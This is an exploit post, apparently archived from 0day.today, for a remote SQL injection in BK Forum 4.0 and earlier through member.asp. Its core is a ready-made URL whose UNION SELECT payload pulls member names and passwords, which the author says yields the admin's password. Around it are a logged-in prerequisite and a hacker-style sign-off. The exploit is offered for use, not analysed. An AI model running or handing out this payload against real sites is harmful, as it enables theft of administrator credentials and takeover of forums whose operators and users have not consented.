id: 380
date: 04/23/2006
title: BK Forum <= 4.0 (member.asp) Remote SQL Injection Vulnerability
author: n0m3rcy
cves: 

===============================================================
BK Forum <= 4.0 (member.asp) Remote SQL Injection Vulnerability
===============================================================




# BK Forum <= 4.0 Remote SQL Injection
# by n0m3rcy
# Copyright (c) 2006 n0m3rcy 
# Exploit:

First you must be logged in
Then type this in your browser

http://www.site.com/path/member.asp?id=-1%20UNION%20SELECT%201,memName,3,4,5,6,7,8,9,10,11,memPassword,13,14,15,16%20FROM%20member+where+memID=1

You will find admin's password

# Shoutz:
nukedx , nukedx , nukedx :) , cijfer , str0ke , Devil-00

# Have phun!



#  0day.today [2023-03-26]  #